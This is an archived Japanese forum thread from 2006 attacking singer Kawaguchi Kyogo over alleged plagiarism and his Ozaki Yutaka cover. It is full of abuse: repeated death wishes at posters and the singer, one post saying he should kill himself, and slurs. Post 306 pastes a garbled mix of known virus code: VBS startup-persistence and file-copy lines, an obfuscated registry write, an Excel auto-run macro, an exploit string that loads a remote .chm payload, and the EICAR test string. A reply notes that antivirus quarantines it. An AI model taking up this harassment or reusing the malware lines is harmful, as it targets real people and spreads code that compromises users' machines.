こんなアホをアーティスト扱いしてる馬鹿はマジで死んでおk。
尾崎はカバー?ふざけんなよ。全部カバーだろが。ただし無断のな。
某ラジオDJにまで失笑かっておいて、よく恥も知らずテレビとか出れること。

177 :NO MUSIC NO NAME:2006/02/28(火) 00:51:15 ID:srw2EeF/
合唱コンクールの課題曲に河口さんの曲が使われていたことを、あるTV番組を見て知りました。
番組を見ていくと、いろいろな合唱団や中学生が河口さんの曲と自由曲を歌われていました。
もう感動ものでした。中には自分が通っていた中学校も出場し、何と賞まで取っていました。
全然知らなかったので驚きましたが、ファンとしては河口さんの曲が多くの人たちに歌われた
事がうれしいですね。

178 :NO MUSIC NO NAME:2006/02/28(火) 12:28:27 ID:z8IbIfB6
河口さんが多くの人達の曲を勝手にアレンジして歌われたんですよ
そのパクってアレンジした曲を多くの人達が河口さんが作ったと錯覚して歌ってる
ってことは河口は嘘をついて人を騙した罪にも問われますね

179 :NO MUSIC NO NAME:2006/02/28(火) 18:31:05 ID:tPS4c8kL
ここみてたら、もう河口は一発屋とパクリのイメージしかなくなった。
そんなにこの人嫌いなんかな〜

180 :NO MUSIC NO NAME:2006/02/28(火) 20:09:50 ID:UsfypFbJ
どうでも良いし全くこの人の事知らなかったが
尾崎のあの歌は酷いと思った
あの歌で判断したくはないが、それにしても酷すぎる

181 :NO MUSIC NO NAME:2006/02/28(火) 22:53:54 ID:z8IbIfB6
こいつが尾崎歌うんなら芸人が歌う尾崎の方が上手いと思った

182 :NO MUSIC NO NAME:2006/03/01(水) 00:32:06 ID:C57QKKRi
25 *10,139 河口恭吾
桜が40万以上売れたのにその桜が入ってるベストがこれwwwwwww

*8 *32,592 徳永英明
徳永さんの3分の1以下かよwwwwww

183 :NO MUSIC NO NAME:2006/03/01(水) 00:50:58 ID:/Tn6PVMa
>>177
厨房氏ね。

184 :NO MUSIC NO NAME:2006/03/01(水) 16:27:29 ID:8dUJevQP
こんなクズを庇うつもりは全くないが、尾崎の歌唱レベルもひどすぎだろ。
どちらも聞くに耐えない雑音レベル。

185 :NO MUSIC NO NAME:2006/03/02(木) 00:10:34 ID:lR1DhubH
>>184
氏ね

186 :NO MUSIC NO NAME:2006/03/02(木) 01:15:26 ID:PAG7jGBK
>>185
尾崎厨発見www
頭ワルスwwwww
お前、薬物中毒者の犯罪推奨歌なんか喜んで聴いてんのか?www

187 :NO MUSIC NO NAME:2006/03/02(木) 10:05:45 ID:QLit7AwR
河口厨が尾崎叩いてるのか?
次元が違うな

188 :NO MUSIC NO NAME:2006/03/02(木) 16:12:53 ID:PAG7jGBK
>>187
はぁ?河口みてーな雑音、聴かねーよw
俺に言わせりゃどっちもどっち。
ただ、尾崎みたいな、自分の責任を他人に転嫁して正当化するようなDQNソングを
真に受けて有り難かってるような池沼ニートが、偉そうに河口恭吾けなしてるのは、
痛々しすぎて見るに耐えないw

189 :NO MUSIC NO NAME:2006/03/02(木) 22:09:15 ID:D+r5SWHR
中居がうたばんで「むかしいたーアッ」って言ってた…

190 :NO MUSIC NO NAME:2006/03/03(金) 00:01:49 ID:WYTr36Tw
曲名忘れたんですが徳永英明の「僕のそばに」のカバー曲歌ってるのってこの人ですか?
以前ラジオか何かで聴いたんですが、久しぶりに徳永英明の歌が聴けてよかったです^^
これからももっと徳永英明の名曲を歌ってほしいです。(できれば「輝きながら」をお願いします!)

191 :NO MUSIC NO NAME:2006/03/03(金) 01:08:09 ID:Fe1zCjMd
徳永英明スレ荒らしてるのって河口ヲタでしょ?
ファンまで最悪なんですね

192 :NO MUSIC NO NAME:2006/03/03(金) 01:21:05 ID:gV1yF+o1
>>188
氏ね


193 :NO MUSIC NO NAME:2006/03/03(金) 16:19:02 ID:R2AqKd8D
http://www.youtube.com/watch?v=pbFOebz5EbA
こっちの方が全然上手いからw

194 :NO MUSIC NO NAME:2006/03/03(金) 23:02:53 ID:tgUtaU/O
http://www.youtube.com/watch?v=nqTXDQDChb0&search=ozaki

195 :NO MUSIC NO NAME:2006/03/03(金) 23:26:52 ID:zRpjEn7G
>>194
河口さんの曲をパクリましたね!

196 :NO MUSIC NO NAME:2006/03/04(土) 03:15:12 ID:JIV+BDK8
あの歌い方は、人にかわいいとか言われたいんだろ
性格もキモいな

197 :NO MUSIC NO NAME:2006/03/04(土) 09:22:06 ID:Wc5u5ysP
うたばんで仲居が思わず過去形扱いしてたね

198 :NO MUSIC NO NAME:2006/03/04(土) 09:24:31 ID:Wc5u5ysP
既出だったかごめそ

199 :NO MUSIC NO NAME:2006/03/06(月) 22:40:07 ID:gq5dhSIv
尾崎には触れてほしくなかった・・・
河口だから駄目とかいうんじゃなくて(もちろん河口はうんこだが)
尾崎は駄目なんだよ。タブーなんだよ。
尾崎の歌を歌っていいのは尾崎だけなんだよ。


200 :NO MUSIC NO NAME:2006/03/07(火) 00:03:20 ID:D8JWz6hx
>>199


201 :NO MUSIC NO NAME:2006/03/07(火) 15:42:05 ID:ix6bB86P
>>199
まぁDQNの歌を歌えるのはDQNだけだからな。
ものを盗んだり壊したり、とんでもない犯罪推奨歌ばかり。
ありがたがってる奴は、学校や社会に馴染めない社会不適合者ばかり。
自分は何も努力せず、認めてもらう事ばかり要求するクズばかり。

202 :NO MUSIC NO NAME:2006/03/07(火) 17:32:44 ID:D6jnvBP0
尾崎を舐めちゃいかんよ

203 :NO MUSIC NO NAME:2006/03/07(火) 18:26:30 ID:ix6bB86P
何がどう凄いかをちゃんと言葉で説明できないのが、典型的な尾崎厨の頭の悪さだなw
うまい反論の言葉が浮かばないと「氏ね」でお茶を濁してごまかしたりな(´∀`)
まぁスレ違いだな、スマン。

204 :NO MUSIC NO NAME:2006/03/08(水) 00:09:28 ID:GApL3EIg
>>203
氏ね。

205 :NO MUSIC NO NAME:2006/03/08(水) 08:37:19 ID:WAXKSUAf
まだ人の歌で金もらってんのかこいつ

206 :NO MUSIC NO NAME:2006/03/08(水) 17:07:01 ID:C1ax/2BQ
河口スレで尾崎に熱くなっちゃいかんよ
どんな歌手でも尾崎には触れちゃいかんよ

207 :NO MUSIC NO NAME:2006/03/09(木) 18:09:33 ID:JJntQceD
悪口ばっかだねココは。フアンが集まってると思ったら・・・。

208 :NO MUSIC NO NAME:2006/03/09(木) 20:38:25 ID:VLKR59U9
ねらーでこんなクソ野郎のファンなんていねぇだろ。
おい河口、見てんだろ?お前は邦楽界の恥さらしだ。
さっさと謝罪して引退汁。

209 :NO MUSIC NO NAME:2006/03/09(木) 22:22:24 ID:svqK34CZ
>>206
触れちゃいかんって、宇多田ヒカルやらマッキーやらが歌っているトリビュートアルバムが堂々と売られているわけだが。

210 :NO MUSIC NO NAME:2006/03/10(金) 01:58:44 ID:zhLESkfT
トリビュートはいいけど
流石に自分のアルバムに入れるのはマズイだろw

211 :NO MUSIC NO NAME:2006/03/11(土) 19:15:02 ID:2auZMl9K
>>201 >>203
201 :NO MUSIC NO NAME:2006/03/07(火) 15:42:05 ID:ix6bB86P
>>199
まぁDQNの歌を歌えるのはDQNだけだからな。
ものを盗んだり壊したり、とんでもない犯罪推奨歌ばかり。
ありがたがってる奴は、学校や社会に馴染めない社会不適合者ばかり。
自分は何も努力せず、認めてもらう事ばかり要求するクズばかり。

203 :NO MUSIC NO NAME:2006/03/07(火) 18:26:30 ID:ix6bB86P
何がどう凄いかをちゃんと言葉で説明できないのが、典型的な尾崎厨の頭の悪さだなw
うまい反論の言葉が浮かばないと「氏ね」でお茶を濁してごまかしたりな(´∀`)
まぁスレ違いだな、スマン。

【Life in DownTown】槇原敬之 part53【買ってね】
http://music5.2ch.net/test/read.cgi/musicjm/1140798580/
4 :NO MUSIC NO NAME:2006/03/07(火) 16:41:05 ID:ix6bB86P
>>776
>マキッー
>マキッー
>マキッー
>マキッー
>マキッー
5 :NO MUSIC NO NAME:2006/03/07(火) 22:01:38 ID:ix6bB86P
>>801
おいおい、ホモは疑惑だが、覚醒剤は疑惑じゃなくて確定だぞ。
勝手に前科をごまかさないでくれ。

212 :NO MUSIC NO NAME:2006/03/12(日) 00:44:25 ID:+vMOTloA
尾崎って人が河口さんの歌を盗作したってホントですか?
もしかしてその尾崎って人は徳永さんの関係者で、パクリの仕返し?

213 :NO MUSIC NO NAME:2006/03/12(日) 02:32:17 ID:UkNgJ4Dq
>>212
もう良いから乙

214 :NO MUSIC NO NAME:2006/03/12(日) 21:36:19 ID:jCCmhVEi
そっくりの曲をインスパイアしたパクリの河口

215 :NO MUSIC NO NAME:2006/03/14(火) 17:43:24 ID:x0LSlaxT
>>199
槇原も尾崎の「Forget me not」を歌ってるぞ。
誰が尾崎の曲を歌おうがいいだろうに。


216 :NO MUSIC NO NAME:2006/03/14(火) 17:45:53 ID:x0LSlaxT
ついでに。
自分は10数年前は徳永ヲタだった。
徳永は尾崎と接点はなかったと思うが
尾崎の死を悲しんでた。
そういうことかw


217 :まあ:2006/03/14(火) 18:42:15 ID:JeItgA1C
尾崎なんか誰でも歌えるから物真似も多い。だからそれを歌えても大した事はないよ。尾崎の何がすごいのかよく分からんし、それを歌う河口も大した事はない。美空ひばりを歌うとかなら話は別だが。

218 :NO MUSIC NO NAME:2006/03/14(火) 18:42:58 ID:BeRKmRlK
>>215
槇原も好きなのか?

219 :NO MUSIC NO NAME:2006/03/14(火) 21:53:10 ID:x0LSlaxT
>>218
槇原は歌が好きだ
尾崎は自分にとって神だった
徳永は真面目すぎたんだな。
モヤモヤ病の要因もそこから来たんだろう。たぶんな。

220 :NO MUSIC NO NAME:2006/03/14(火) 22:55:47 ID:I4HfmMPO
>>216
尾崎は徳永のことを尊敬してた。
徳永も尾崎が生きてたら音楽業界で唯一の友達になれたかもしれないって語ってる。

〜徳永英明の自叙伝より〜




河口のことじゃなくてすまんね。

221 :NO MUSIC NO NAME:2006/03/15(水) 00:27:42 ID:gnjmXVWZ
河口なんてどうでもいいよ。

222 :AMJTW:2006/03/15(水) 00:50:42 ID:jLybSspA
あんなへたくそ どうでもいいよ。素人がカラオケ歌ってるようなもんだろ。NHKのど自慢で鐘1つたたかれとけばいいんだよ。

223 :NO MUSIC NO NAME:2006/03/16(木) 13:06:59 ID:ehjz/FUG
>>219
河口は好きじゃないのか?w

224 :NO MUSIC NO NAME:2006/03/17(金) 00:20:19 ID:EINp3HOV
ウンコー!(゚∀゚)!

225 :NO MUSIC NO NAME:2006/03/17(金) 03:15:44 ID:WZ718XoL
俺も河口恭吾は下手くそに1票だな

226 :NO MUSIC NO NAME:2006/03/18(土) 01:25:15 ID:GJJlI9Ye
朴李野郎氏ね

227 :NO MUSIC NO NAME:2006/03/18(土) 14:15:35 ID:kgVfvcmx
邦楽板でこれだけ一方的に叩かれるやつも珍しいよな。
クソレンジですら擁護派がいるってのにさ。
というわけで河口は邦楽界のゴミクズ決定。

228 :NO MUSIC NO NAME:2006/03/18(土) 21:23:09 ID:imdfQZoI
みなさん河口さんを叩き過ぎ!
パクリの度合いを示すのに「河口クラス」というレベルを確立した偉大な人なのに。

229 :誰やねん:2006/03/18(土) 22:06:21 ID:PBIj8UDL
こんなへたくそを世の中に出したのは、本人もこんなへたやのに、よく歌手になりたいと思ったな。サラリーマンしとけ。とにかく歌うな、下手くそ。素人に笑われるぞ。

230 :NO MUSIC NO NAME:2006/03/18(土) 22:14:35 ID:2onbZ8WL


231 :NO MUSIC NO NAME:2006/03/30(木) 20:28:04 ID:afO+lO+K
下手なくせに歌い方を他人に調教してまつよ。
・・・歌が下手になるので調教しないできゅれ

232 :NO MUSIC NO NAME:2006/03/30(木) 21:14:44 ID:mcO4ak8X
嫌いならこんな糞スレageるなよ
dat落ちさせりゃいいじゃんw

233 :NO MUSIC NO NAME:2006/03/30(木) 21:25:09 ID:OAWpEDM/
>>229
その前に、お前の日本語が笑われるぞ…

234 :NO MUSIC NO NAME:2006/03/31(金) 00:23:11 ID:UDii5ZoH
こいつはヽ(・∀・)ノ●ウンコーヽ(・∀・)ノ●ウンコーヽ(・∀・)ノ●ウンコー

235 :NO MUSIC NO NAME:2006/03/31(金) 05:47:40 ID:pV8qkpRY
おまえらはウンコにたかるハエだな(ゲラゲラ

ウンコは肥料になるが、ハエはハエ捕り紙にくっつけとくしか使い道がないな(爆笑)

236 :NO MUSIC NO NAME:2006/03/31(金) 21:29:45 ID:d8gqQyyj
「桜」って徳永英明の「僕のそばに」にそっくりじゃねぇかよ!
Mステの春うたランキングでパクリ魔の曲が入ってていいのかYO

237 :NO MUSIC NO NAME:2006/03/32(土) 09:33:48 ID:Uq0kSoLK
ウンコだからいいんだよ

238 :NO MUSIC NO NAME:2006/04/02(日) 12:05:06 ID:y2dU4Kaj
>>235
河口本人降臨乙。

239 :NO MUSIC NO NAME:2006/04/02(日) 18:01:49 ID:ajWRktz2
こら233お前な、河口のどこが上手いねん。耳悪いんかどあほ。あんなもん素人やんけ。

240 :NO MUSIC NO NAME:2006/04/03(月) 19:15:48 ID:8ayJXKoH
徳永のパクリでいい顔するな、下手。
尾崎の曲も、質が落ちる。

241 :235:2006/04/04(火) 02:27:43 ID:XFa4NAyu
>>238
いや、本人じゃないけど本人と言われて正直嬉しい。
オナニーして寝ます。

242 :NO MUSIC NO NAME:2006/04/04(火) 02:30:44 ID:XFa4NAyu
おお!IDが あゆ だ。
ここがソロ女性板ならなぁ〜

243 :NO MUSIC NO NAME:2006/04/04(火) 18:12:04 ID:9vXvYmjM
>>242
あんなカス女の名前がIDで嬉しいか?

244 :NO MUSIC NO NAME:2006/04/04(火) 18:55:42 ID:XFa4NAyu
>>243
で、お前は河口恭吾とどっちがカスだと思うんだ?

245 :NO MUSIC NO NAME:2006/04/04(火) 19:39:41 ID:z4byimu+
比べてアーティストの良さを語るのは間違ってる

246 :NO MUSIC NO NAME:2006/04/05(水) 00:39:14 ID:vCbLPQB/
●_(゚∀゚ )≡ モヒョヒョヒョヒョ ヽ(A`)ノ≡ コラァァァ!! ウンコカエセヨー!!

247 :NO MUSIC NO NAME:2006/04/05(水) 03:38:58 ID:8LpQgmLQ
>>245
いやいや、あゆはスレ違いだし?
返答に困らせてすまんな。


まあお前の答えはそうか。なるほど。

248 :NO MUSIC NO NAME:2006/04/05(水) 03:54:54 ID:8LpQgmLQ
良さを語るの間違いっつっても、叩くのも称賛するのも、個人の感じ方次第だしな。
何が良くも何が悪くもない。そもそも他者への強制ではないので間違いも何もない。

個人的に語るなら、自分にとっては過去に好きだった、流行りモノで追っかけた某男性アーティストよりは良い
っつう“感じ方”だ。
成長によって、個人的な良し悪し(好み)が変わる(確立される)のは仕方ない。

249 :NO MUSIC NO NAME:2006/04/05(水) 18:32:25 ID:qSvO0poK
>>247
おいおい、お前がレスつけたのは別人だタコ。
俺の返事は両方カスでFA。

250 :NO MUSIC NO NAME:2006/04/05(水) 18:35:05 ID:qSvO0poK
>>248
全く見当はずれの書き込みだな。
河口が叩かれてるのは、「あからさまにパクった曲で金稼いでるから」の一言につきる。
良いとか悪いとか以前の問題。

251 :NO MUSIC NO NAME:2006/04/05(水) 20:27:08 ID:k0PKpWiO


252 :NO MUSIC NO NAME:2006/04/05(水) 21:33:17 ID:Es97mH+P
( ゚∀゚)つ●ウンコクウカ? ⊂(゚∀゚ )センキュゥー♪

253 :NO MUSIC NO NAME:2006/04/06(木) 03:43:26 ID:X23akbef
>>249
いやいや、247の話題は>>243>>245かどうかじゃなく、完全に245に向けてのレスなので
関係ないお前にタコと言われても。
そもそも243(お前)に対して「どっちがカスと思うのか」と尋ねた(>>244)のは、
245が「間違ってる」と言うような「比べて良さを語る」などの目的は全くなく、
河口恭吾のスレで243が、主観的にカスと思う別アーティストについて、わざわざ「嬉しいか?」と
ネタ振りして叩こうとしているその滑稽さを皮肉って河口の話題に戻してやったまで。
お前は誰を叩きたくてこのスレにいるのか、と。
そして245については(>>247では)、245の言うような意図はないことと、
245自身がもし、河口ファンでないのに上の流れを「河口を誰かと比べてその良さを語ろうとしている」
と思ったのなら、そこに245の答えがあるのだな、なるほど、という意味。
「返答に困らせて〜」の文がお前を勘違いさせてしまったかもしれんが、
いちいちどのレスが誰とかお前の自己主張は不要だから。
何のアーティストでもとにかく叩きたい、しかも自意識過剰ということはわかったよ。

>>250
おいおいお前へのレスじゃない話題なんだけど?見当はずれはどっちなんだか。
>>248は、「比べてアーティストの良さを語るのは間違ってる」という245のレスについて、
「比べてアーティストの良さを語るのは間違ってるかどうか」の個人的考察と、
「それに則り誰かと比べて語るなら、個人的には河口についてどう感じているか」
を書いたまで。
「なぜ河口恭吾が叩かれるか」の考察ではないよ?見当違いはお前さん。
そうイライラして闇雲にアンカーつけてレスしないほうがいいよ。
論点理解できてないみたいだし、もっとも全部の書き込みがお前へのレスじゃないんだからさ。
恥晒しだぞ?

254 :NO MUSIC NO NAME:2006/04/06(木) 03:45:52 ID:X23akbef
まあ、叩かれるだけその分のリスナーがいるってことだわな。河口恭吾も。

255 :NO MUSIC NO NAME:2006/04/06(木) 21:11:08 ID:9preuKoj
>>253-254が必死過ぎて引きましたw
100文字以内に読みやすくまとめろタコ

256 :NO MUSIC NO NAME:2006/04/07(金) 18:30:50 ID:n7RgMMpq
>>253が頭が悪く、三流大学の学生だと言うことはよく分かったw
こんな馬鹿も2ちゃんにくるようになったんだなw

257 :NO MUSIC NO NAME:2006/04/13(木) 23:46:50 ID:g2s+QsmN
で結論として
尾崎豊を歌っていいのは井上マーだけってことだな

258 :NO MUSIC NO NAME:2006/04/18(火) 01:52:58 ID:yG+LF+X+
そろそろ

259 :NO MUSIC NO NAME:2006/04/21(金) 00:49:28 ID:GCeVl34I
聞こえる…
河口恭吾の楽曲が叫んでる
「もう俺自分に嘘(パクリ)なんてつきたくねぇんだーーーーーー!!!」

260 :NO MUSIC NO NAME:2006/04/22(土) 00:28:00 ID:OtSsIGGL
聞こえる…
河口恭吾に歌われた「I LOVE YOU」が叫んでる
「ここ(河口恭吾)は俺の居場所(歌い手)じゃねぇぇぇぇぇーーーーーー!!!」

261 :NO MUSIC NO NAME:2006/04/23(日) 22:42:49 ID:3T7ZruW0
ここおもしろいw

河口さんんの話は全然でてこないw

262 :NO MUSIC NO NAME:2006/04/23(日) 23:22:42 ID:cHu9jKJw
>>261
河口さんんてなんだ《゚Д゚》ゴラァァァァァァァァァァァァア!!

263 :NO MUSIC NO NAME:2006/04/24(月) 01:13:09 ID:OdANlYiO
こいつ邦楽男性ソロ板じゃなくて伝説板が相応しいと思うんだ。

264 :NO MUSIC NO NAME:2006/04/24(月) 23:59:51 ID:HhanlErZ
聞こえる…
徳永英明の「僕のそばに」が叫んでる
「なぜ…人はこうも…奪い……あう…」

265 :NO MUSIC NO NAME:2006/04/25(火) 10:29:16 ID:LUX2zt0+
河口さんはパクった後に開き直ったのが良くない。
徳永さんは河口さんの事を許したのに河口さんからは謝罪も何も無い。
潔くない態度が評判を落としたよね。

266 :NO MUSIC NO NAME:2006/04/25(火) 15:20:29 ID:b5JdZkay
河口みたいなクズに「さん」づけする事ねーよ

267 :NO MUSIC NO NAME:2006/04/25(火) 17:13:29 ID:7ZoIvywr
歌ヘタって行ってる奴死ね
てめぇらに歌の何が分かる

268 :NO MUSIC NO NAME:2006/04/26(水) 00:13:54 ID:Lg4f5da3
>>267
パクリはオリジナルを越えられない事位なら分かる

269 :NO MUSIC NO NAME:2006/04/26(水) 01:30:47 ID:T1pWvMnj
>>267
河口君、いつも巡回ご苦労様。
早く引退した方がいいよ。
てか氏ねクズ。

270 :NO MUSIC NO NAME:2006/04/26(水) 09:56:34 ID:sBsHY/nX
http://www.hmv.co.jp/product/detail.asp?sku=1334331

271 :NO MUSIC NO NAME:2006/04/28(金) 00:00:56 ID:YvUbh1Gw
http://auction.msn.co.jp/item/65588752

272 :NO MUSIC NO NAME:2006/05/01(月) 00:03:00 ID:r1FLwrm1
●ヽ(゚∀゚ヽ)ウン-コー♪ヨイヤサーヨイヤサー♪(ノ゚∀゚)ノ●

273 :NO MUSIC NO NAME:2006/05/01(月) 11:17:23 ID:V25jNUaE
はてなダイアリーにも載ってますね。
http://d.hatena.ne.jp/keyword/%b9%f5%ce%f2%bb%cb%3a%3a%b2%bb%b3%da

274 :NO MUSIC NO NAME:2006/05/03(水) 11:02:11 ID:tDi4AHph
河口、クラウンに移籍。

第1弾シングル6/28発売!

275 :NO MUSIC NO NAME:2006/05/03(水) 19:51:36 ID:jXOyjiiv
共鳴野郎でスキマの全力少年のサビを歌っていた。
酔っぱらったリーマンのカラオケ状態だた。

凶誤「この曲、難しいんだよ」

…おまいが下手なだけだ。


276 :NO MUSIC NO NAME:2006/05/03(水) 22:11:28 ID:T4a/sOJa
間違えて演奏を止めても悪びれる様子もないなんて大物ですね。

277 :NO MUSIC NO NAME:2006/05/04(木) 19:51:19 ID:y8t+FO/+
a

278 :NO MUSIC NO NAME:2006/05/04(木) 21:49:35 ID:fkCDDBaC
日比谷野音行ってきた。
河口3曲しか歌わなかったよ。一番少なかったかも。

>>274
6/28に新曲発売なの?
徳永英明も同じ日に新曲出すんだけど。
アルバムといいまた被ったね。

279 :NO MUSIC NO NAME:2006/05/05(金) 21:42:32 ID:uPe2kgys
こいつが尾崎の曲を歌ってるの聴いたら腹がたつ
消えろ うざい

280 :NO MUSIC NO NAME:2006/05/06(土) 01:20:17 ID:lldD4SoS
そういや昔、尾崎のカバーを出したアーティストが、尾崎ファンにナイフで刺された事件があったな。
今の尾崎ファンは馬鹿で愚図でヘタレばかりだから心配ないけど、気を付けないとね。

281 :NO MUSIC NO NAME:2006/05/24(水) 06:52:07 ID:61y4ugPA
保守

282 :NO MUSIC NO NAME:2006/05/28(日) 13:34:50 ID:HnnadES/
群青が一番名曲。
何でカップリングで出したか不思議。

283 :NO MUSIC NO NAME:2006/05/28(日) 15:04:24 ID:BcTQ86UJ
群青と言うと谷村新司が東宝『連合艦隊』の主題歌としてヒットさせた名曲ですね。
http://west-village.main.jp/2006music/2-ka/mgunjyo.html

284 :NO MUSIC NO NAME:2006/05/28(日) 16:35:04 ID:HnnadES/
>>283
全く違うしw

285 :NO MUSIC NO NAME:2006/05/28(日) 18:20:47 ID:vQQPW6TN
何でワーナー追い出されたの?
売れないから?

286 :NO MUSIC NO NAME:2006/05/28(日) 18:30:58 ID:HnnadES/
>>285
売れない時からワーナーがお世話してたんじゃん。
ワーナーは良い会社だと思う。

287 :NO MUSIC NO NAME:2006/05/29(月) 23:05:58 ID:8B07yNcK
「群青」良いね。カラオケで良く歌うよ。

288 :NO MUSIC NO NAME:2006/05/30(火) 11:20:09 ID:T2I5R+gx
※「僕のそばに」たまに歌う。やっぱ「桜」よりしっかり組まれた曲かなとは思う。

289 :NO MUSIC NO NAME:2006/06/02(金) 20:59:31 ID:SKlrgAEn
俺もカラオケで群青を良く歌うが、おっさん本人は出てこんで良いから「連合艦隊」の映像を流して欲しかったな。

290 :和田義彦:2006/06/05(月) 00:02:46 ID:lrlrXvXh
パクリではありません、共同制作です。

291 :☆みぃたん☆( ^∀^) ◆OZmNRSCHQY :2006/06/07(水) 02:18:52 ID:pJpXekQm
こういう一発屋

さっさと自殺すればいいのにね

キモ〜い

292 :☆みぃたん☆( ^∀^) ◆OZmNRSCHQY :2006/06/07(水) 02:21:20 ID:pJpXekQm
ヲタとかいるのカナwwwwwwwwWWWWWWWWWWWWWWWWWWWWWWwwwwwwwwwwwwwwwwwWWWWWWWWW

293 :NO MUSIC NO NAME:2006/06/13(火) 00:47:39 ID:Ch/4+RlS
この人のアルバム(シングル?)と徳永英明のアルバム(シングル?)のジャケット写真がそっくりなのはカバーしてるから?
ツタヤ行ったら並んで置いてあったから・・・

294 :293:2006/06/13(火) 00:50:24 ID:Ch/4+RlS


徳永英明じゃないかも。
ごめん、酔ってたからうろ覚え。
間違った情報だったら本当にすんません

295 :NO MUSIC NO NAME:2006/06/13(火) 18:11:07 ID:EHfTVdWm
普通の人よりもライブに行っているが、この人は素で下手。
インディーズレベルと言われても仕方が無い。
いまだにCMとかで使われているのは、何か別の理由があるんだろうな。

296 :NO MUSIC NO NAME:2006/06/15(木) 21:19:06 ID:tn0f/LKW
>>294
徳永英明で合ってるよ。
表も裏も激似。

297 :NO MUSIC NO NAME:2006/06/15(木) 21:20:30 ID:CLay0mE+
まだ居たの?w

298 :NO MUSIC NO NAME:2006/06/18(日) 19:07:52 ID:vUYLt4ON
河口恭吾

299 :NO MUSIC NO NAME:2006/06/18(日) 21:21:02 ID:NsSo6cBT
この人にオリジナリティとか歌唱力とかを期待してはいけない。
如何に上手にコピペしているかを評価すべきである。

300 ::2006/06/20(火) 00:03:30 ID:rgHUn99W
>売れない時からワーナーがお世話してたんじゃん

これは誤り。最初にいたのは日立マクセル。
有線で「桜」が1位になった記念で一度マクセルからシングルリリース

直後、日立が音楽部門撤退を表明→「桜」廃盤に

ワーナーが版権貰って「桜」再リリース→40万枚のヒット、という流れ。


つまり、ワーナーにとっちゃ、
「桜」は初めから単なる小銭稼ぎのネタでしかなかったわけだW

301 :NO MUSIC NO NAME:2006/06/21(水) 10:19:10 ID:V+nWlUew
http://www.hmv.co.jp/product/detail.asp?sku=1266801

302 :NO MUSIC NO NAME:2006/06/22(木) 05:47:04 ID:1Z/5feO1
>>301
これマジ?
尾崎の影響かぁ?
やばいんじゃない、こんなタイトル。
メジャーの歌手なんだから影響力考えないと。

303 :NO MUSIC NO NAME:2006/06/22(木) 06:05:44 ID:1Z/5feO1
>>300
今度移籍したクラウンはプロのレーベルで自主制作できるし
河口恭吾が還元率選んだんだろうな。
独立した様なもんだな。

304 :NO MUSIC NO NAME:2006/06/30(金) 01:53:46 ID:SV4v9v/t
今日のディアモールの模様後半
個別には落とせません(riknaは除いています)
事情で別のアーチストも含んでいます


305 :NO MUSIC NO NAME:2006/06/30(金) 16:47:50 ID:JzOOWt3A
祝『なぎさ音楽祭』参加あげ!

306 :NO MUSIC NO NAME:2006/06/30(金) 23:45:05 ID:ub18Mq2W
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

307 :NO MUSIC NO NAME:2006/07/01(土) 09:59:57 ID:b9it/H+k
>>306
これっていろんなとこ張りまくってるみたいだけど
ノートン君がウイルスつーことで検疫するんだけどおなぁ
そのまま読み込み注意だべ


308 :NO MUSIC NO NAME:2006/07/07(金) 01:23:13 ID:yrjvfARX
http://www.oricon.co.jp/music/release/d/656919/1/

初登場119位おめでと〜ございます(爆笑)

309 :こうのとり:2006/07/07(金) 19:01:49 ID:3S2X1mW7
http://miraclebus.txt-nifty.com/kyogo/

このブログ最高だよ〜!!

310 :NO MUSIC NO NAME:2006/07/08(土) 16:48:15 ID:pHOQ1/05
119位って・・・w

311 :NO MUSIC NO NAME:2006/07/29(土) 01:51:37 ID:sSp2n5Vj
基本的に河口は下手。なのに何故世に出たのか、不思議で仕方がない。うまけりゃ当然だが、下手だから。サラリーマンがお似合いだよ

312 :NO MUSIC NO NAME:2006/08/09(水) 13:16:14 ID:MAB9tZc+
徳永英明
尾崎豊

この2人 なんとなく歌声似てるわね

313 :NO MUSIC NO NAME:2006/08/18(金) 23:37:54 ID:EVWcs/B1
もはや伝説のミュージシャン

314 :NO MUSIC NO NAME:2006/08/21(月) 02:12:11 ID:8I99AxcO
なんて言うか・・・かつて無い一発屋だったね
でもアルバム全部買いました

315 :NO MUSIC NO NAME:2006/08/22(火) 10:22:29 ID:ye0SeDn+
>312
だろうね、尾崎豊は徳永英明好きだったらしいから

316 :NO MUSIC NO NAME:2006/08/24(木) 00:11:14 ID:dNyplsh6
この人ってゲイ?

317 :蚊羽愚血凶誤:2006/08/28(月) 01:40:23 ID:I7oZ4vKO
なんじゃ新曲の「会社をやめて旅行に行こう」って?
日本社会を舐めとんのか。

はよ事務所やめて旅に出ろ


318 :NO MUSIC NO NAME:2006/08/30(水) 14:20:43 ID:UB5iYCPY
新曲がまさに今の自分の心境にピッタリだった…全然ファンでもないがこのCD買おう。まじで会社辞めて旅に出ようかな…

319 :NO MUSIC NO NAME:2006/09/04(月) 23:34:01 ID:KwJQVnXe
会社をやめて、オリコン初登場145位 714枚wwwプゲラ インディ以下

320 :NO MUSIC NO NAME:2006/09/05(火) 00:17:27 ID:TXaq3cq1
